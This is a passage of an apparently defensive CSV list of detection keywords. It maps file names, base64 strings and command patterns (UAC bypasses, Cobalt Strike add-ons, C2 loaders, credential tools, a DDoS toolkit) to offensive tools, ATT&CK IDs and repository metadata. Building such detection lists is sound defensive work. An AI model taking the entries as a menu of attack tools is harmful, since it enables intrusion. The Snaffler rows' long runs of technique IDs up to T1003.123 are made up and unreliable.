TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*U2VhdGJlbHQuZXhl*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*uac fodhelper *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac sdclt *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac_bypass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UAC-bypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A",,"N/A",,, +"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*UACBypassedService.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*uac-schtasks*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*UACTokenManipulationManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*uberfile --lhost* --lport * --target-os * --downloader *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","greyware_tools high risks of false positives","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*udmp-parser-main*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*UDVC-Server.exe -c * -i 127.0.0.1*","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","242","54","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" +"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1923","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" +"*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*uhttpsharp.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*uknowsec/TailorScan*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*UlBDIFNlcnZlciBIb3N0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UlBDIFNlcnZlciBQb3J0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Ullaakut/Gorsair*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*UltraSnaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red 